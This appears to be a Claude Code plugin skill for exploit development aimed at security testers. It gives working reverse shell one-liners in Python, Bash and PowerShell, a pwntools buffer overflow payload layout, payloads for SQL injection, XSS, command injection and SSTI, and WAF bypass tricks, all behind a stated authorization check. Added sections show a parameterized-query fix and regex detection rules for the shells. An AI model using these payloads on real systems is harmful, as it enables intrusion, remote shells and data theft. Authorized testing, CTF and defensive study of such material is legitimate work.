From cybersecurity
Assists with authorized exploit development, PoC creation, payload engineering, and shellcode analysis for security testing, CTFs, and bug bounties.
Slash command: /cybersecurity:03-exploit-development
Enable Claude to assist security professionals with authorized exploit development, proof-of-concept creation, payload engineering, and vulnerability exploitation research. Every workflow in this skill requires confirmed authorization context before proceeding.
CRITICAL — AUTHORIZATION GATE: Before performing any task in this skill, Claude must confirm one of the following authorization contexts:
- Written penetration testing authorization (scope document, SOW, or rules of engagement)
- Bug bounty program scope (confirm target is in-scope)
- CTF competition (confirm challenge name and platform)
- Isolated lab environment the user owns
- Security research on software the user developed
If none of the above apply, Claude must decline and explain why.
This skill activates when the user asks about:
pip install pwntools keystone-engine capstone
Optional tools for authorized engagements:
- pwntools — Binary exploitation framework
- msfvenom — Metasploit payload generator
- ROPgadget — ROP chain discovery
- GDB + GEF/PEDA/pwndbg — Debugging
Before any exploit development task, Claude asks:
To proceed with exploit development, please confirm your authorization context:
1. What is the target system/software?
2. What is your authorization? (e.g., "pentest engagement with signed SOW",
"CTF challenge: [name]", "my own lab", "bug bounty — [program name]")
3. What is the scope or environment? (e.g., isolated VM, production network?)
Without clear authorization context, I cannot assist with active exploitation.
When the user asks to develop a PoC for a known CVE:
Standard PoC Template:
```python
#!/usr/bin/env python3
"""
PoC for CVE-YYYY-XXXX: [Vulnerability Title]
Affected: [Software Name] [Affected Versions]
Fixed in: [Patched Version]
Type: [Vulnerability Class — e.g., Heap Buffer Overflow]
CVSS: [Score] ([Severity])
Author: [Your name] | Date: [Date]
DISCLAIMER: For authorized security testing and research only.
Unauthorized use is illegal and unethical.
Usage:
    Check-only mode (safe): python poc.py --target host --check-only
    Exploitation mode: python poc.py --target host --payload [payload]
"""
import argparse
import sys


def check_vulnerable(target: str) -> bool:
    """Detect vulnerability without exploitation. Safe to run."""
    # [Detection logic — version check, response fingerprint, etc.]
    # Raise until filled in, so an unfinished template never reports "SAFE".
    raise NotImplementedError("detection logic not implemented")


def exploit(target: str, payload: bytes) -> None:
    """Execute the exploitation chain. Requires authorization."""
    # [Exploitation logic]
    raise NotImplementedError("exploitation logic not implemented")


def main():
    parser = argparse.ArgumentParser(description="PoC for CVE-YYYY-XXXX")
    parser.add_argument("--target", required=True, help="Target host:port")
    parser.add_argument("--check-only", action="store_true",
                        help="Only check if target is vulnerable (safe mode)")
    parser.add_argument("--payload", help="Payload to deliver")
    args = parser.parse_args()
    print("[*] Checking authorization: Ensure you have written permission for this target")
    if args.check_only:
        vulnerable = check_vulnerable(args.target)
        print(f"[{'VULN' if vulnerable else 'SAFE'}] Target {'appears vulnerable' if vulnerable else 'does not appear vulnerable'}")
    else:
        if not args.payload:
            print("[-] Payload required for exploitation mode")
            sys.exit(1)
        exploit(args.target, args.payload.encode())


if __name__ == "__main__":
    main()
```
When the user asks to generate payloads (for authorized testing):
Reverse Shell Payloads (reference for authorized testing):
# Python (cross-platform)
python3 -c "import socket,subprocess,os;s=socket.socket();s.connect(('LHOST',LPORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];subprocess.call(['/bin/sh'])"
# Bash
bash -i >& /dev/tcp/LHOST/LPORT 0>&1
# PowerShell (Windows)
powershell -nop -c "$client=New-Object Net.Sockets.TCPClient('LHOST',LPORT);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne 0){$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Use payload_generator.py for structured generation:
python scripts/payload_generator.py --type reverse_shell --os linux --arch x64 --lhost 10.0.0.1 --lport 4444
python scripts/payload_generator.py --type bind_shell --os windows --arch x86 --port 4444
python scripts/payload_generator.py --list-types
Payload Type Reference:
| Type | Description | Use Case |
|---|---|---|
| Reverse Shell | Initiates connection to attacker | Outbound firewall allowed |
| Bind Shell | Listens on target port | No egress filtering |
| Staged | Small stager + full payload | Size-constrained contexts |
| Web Shell | PHP/JSP/ASPX shells | Web server access |
| Meterpreter | Full-featured staged payload | Post-exploitation |
When the user asks about buffer overflow exploitation (authorized lab/CTF):
Fuzzing Phase — Find the crash input length:
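```python
# pwntools fuzzing
from pwn import *

for n in range(100, 1000, 100):
    # Fresh process per attempt so each length is tested in isolation
    p = process('./vuln_binary')
    p.sendline(b'A' * n)
    p.wait(timeout=2)   # give the process time to exit or crash
    rc = p.poll()       # None = still running; negative = killed by a signal
    p.close()
    if rc is not None and rc < 0:
        print(f"Crash at {n} bytes")
        break
```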
Offset Discovery — Find exact EIP/RIP offset:
# Generate a cyclic pattern
python3 -c "from pwn import *; print(cyclic(500))"
# In GDB after crash: x/wx $esp → get value → cyclic_find(value)
Bad Character Identification — Find bytes that break the payload:
badchars = b"\x00" # null byte is almost always bad
# Test each byte 0x01-0xff in the payload
Return Address / Gadget Selection:
- JMP ESP in executable memory
- ROPgadget --binary vuln
Exploit Construction:
from pwn import *
# Layout: [JUNK * offset] + [RET addr] + [NOP sled] + [shellcode]
offset = 112
ret_addr = p64(0x401234) # JMP RSP or gadget
nop_sled = b"\x90" * 16
shellcode = asm(shellcraft.sh()) # pwntools shellcode
payload = b"A" * offset + ret_addr + nop_sled + shellcode
When the user asks for web exploitation payloads (authorized testing):
SQL Injection Payloads:
-- Union-based (MySQL)
' UNION SELECT null,username,password FROM users-- -
-- Time-based blind (MySQL)
' AND SLEEP(5)-- -
-- Error-based (MySQL)
' AND extractvalue(1,concat(0x7e,(SELECT version())))-- -
-- Boolean blind
' AND 1=1-- - (true)
' AND 1=2-- - (false)
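The mitigation side of the SQL injection payloads above, as an added example that is not part of the skill: the same lookup written with string concatenation and with a bound parameter, exercised with the page's union-based and boolean-blind payloads. It assumes a constructed in-memory SQLite database; the table, column and function names are hypothetical, and the MySQL-only `SLEEP`/`extractvalue` payloads are not exercised.

```python
import sqlite3

def make_db():
    # Constructed sample data; the users table mirrors the page's UNION payload.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'widget', '9.99');
        INSERT INTO users VALUES ('admin', 'constructed-hash');
    """)
    return db

def search_vulnerable(db, term):
    # Deliberately vulnerable: input is concatenated into the SQL text.
    sql = "SELECT id, name, price FROM products WHERE name = '" + term + "'"
    return db.execute(sql).fetchall()

def search_hardened(db, term):
    # Bound parameter: term travels as data and is never parsed as SQL.
    sql = "SELECT id, name, price FROM products WHERE name = ?"
    return db.execute(sql, (term,)).fetchall()

def union_leaks(search):
    # Union-based payload from the page: does a users row come back?
    rows = search(make_db(), "' UNION SELECT null,username,password FROM users-- -")
    return any("admin" in map(str, row) for row in rows)

def boolean_oracle(search):
    # Boolean-blind pair from the page appended to a valid value: a difference
    # between the two responses is the signal a blind injection relies on.
    db = make_db()
    return search(db, "widget' AND 1=1-- -") != search(db, "widget' AND 1=2-- -")

if __name__ == "__main__":
    for fn in (search_vulnerable, search_hardened):
        print(fn.__name__, "union_leaks =", union_leaks(fn),
              "boolean_oracle =", boolean_oracle(fn))
```

Because the bound value never reaches the SQL parser, case or encoding variations of the same payloads change nothing for `search_hardened`.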
XSS Payloads:
// Basic reflected
<script>alert(document.domain)</script>
// Attribute context
" onmouseover="alert(1)
// Filter bypass (no script tag)
<img src=x onerror=alert(1)>
// DOM-based
#"><img src=x onerror=alert(1)>
Command Injection Payloads:
# Linux separators
; id
| id
&& id
`id`
$(id)
# Windows separators
& whoami
| whoami
SSTI Payloads:
# Jinja2 (Python)
{{7*7}} → 49 (confirms SSTI)
{{config.items()}} → app config
{{''.__class__.__mro__}} → class hierarchy for RCE
# Twig (PHP)
{{7*7}}
{{app.request.server.get('env')}}
When the user asks about AV/WAF evasion for authorized testing:
WAF Bypass Techniques:
- sElEcT instead of SELECT
- SE/**/LECT
- %27 for single quote
- %2527
- /**/
- X-Forwarded-For, chunked encoding
AV Evasion Concepts (for authorized red team operations):
All PoCs produced must include:
- `--check-only` mode that detects without exploiting
payload_generator.py
python scripts/payload_generator.py --type reverse_shell --os linux --arch x64 --lhost 10.0.0.1 --lport 4444
python scripts/payload_generator.py --type bind_shell --os windows --arch x86 --port 4444
python scripts/payload_generator.py --list-types
| Condition | Next/Prior Skill |
|---|---|
| Vulnerability confirmed → build PoC | ← Skill 02 (Vulnerability Scanner) |
| Binary requires RE to find bug | ← Skill 04 (Reverse Engineering) |
| Deliver exploit in engagement | → Skill 14 (Red Team Operations) |
| Generate detection from exploit | → Skill 15 (Blue Team Defense) |
Authorization gate still applies — confirm written authorization / CTF or lab scope before any PoC work.
Modern mitigations a PoC must account for:
__malloc_hook removal in glibc 2.34+, House-of-* variants, UAF→type confusion) over classic unlink; state allocator + version assumptions.
Precision rule: every PoC states target arch/OS/version, mitigations in effect, reliability estimate, and a defensive detection signature so blue teams can act on it.
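A detection signature of the kind the precision rule asks for, written for the three reverse shell one-liners in the payload reference above. This is an added example, not part of the skill: the rule names, hostnames and process-creation log lines are constructed, the logged command lines are abbreviated with `[...]`, and the addresses come from the documentation range 192.0.2.0/24.

```python
import re

# Each rule lists patterns that must ALL appear in one logged command line.
RULES = {
    "bash_dev_tcp_shell": [r"\b(ba)?sh\b.*\s-i\b", r">&?\s*/dev/(tcp|udp)/"],
    "python_socket_shell": [r"\bpython[\d.]*\b.*\s-c\b", r"\bsocket\b", r"\bdup2\b",
                            r"subprocess|pty\.spawn|/bin/(ba)?sh"],
    "powershell_tcpclient_iex": [r"\b(powershell|pwsh)(\.exe)?\b",
                                 r"Net\.Sockets\.TCPClient",
                                 r"\b(iex|Invoke-Expression)\b"],
}
COMPILED = {name: [re.compile(p, re.I) for p in pats] for name, pats in RULES.items()}

def classify(cmdline):
    """Return the names of all rules whose patterns all match the command line."""
    return [name for name, pats in COMPILED.items()
            if all(p.search(cmdline) for p in pats)]

# Constructed process-creation events: (host, user, command line).
SAMPLE_EVENTS = [
    ("web01", "www-data", "bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"),
    ("web01", "www-data", 'python3 -c "import socket,subprocess,os;s=socket.socket();'
                          '[...] os.dup2(s.fileno(),fd) [...] subprocess.call([...])"'),
    ("win07", "svc_app", 'powershell -nop -c "$client=New-Object '
                         'Net.Sockets.TCPClient(\'192.0.2.10\',4444); [...] iex $data [...]"'),
    # Benign look-alikes that must not alert:
    ("web01", "deploy", 'bash -c "ls -l /dev"'),
    ("web01", "deploy", 'python3 -c "import socket; print(socket.gethostname())"'),
    ("win07", "admin", 'powershell -c "(New-Object '
                       'Net.Sockets.TCPClient(\'192.0.2.20\',443)).Connected"'),
]

def scan(events):
    """Return (host, user, matched_rules) for every event that trips a rule."""
    return [(host, user, hits) for host, user, cmd in events if (hits := classify(cmd))]

if __name__ == "__main__":
    for host, user, hits in scan(SAMPLE_EVENTS):
        print(f"ALERT host={host} user={user} rules={','.join(hits)}")
```

Requiring every pattern of a rule to match is what keeps the benign socket and TCPClient lines quiet; the same rules translate directly to Sigma or EDR queries over process command-line fields.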
npx claudepluginhub masriyan/claude-code-cybersecurity-skill --plugin cybersecurity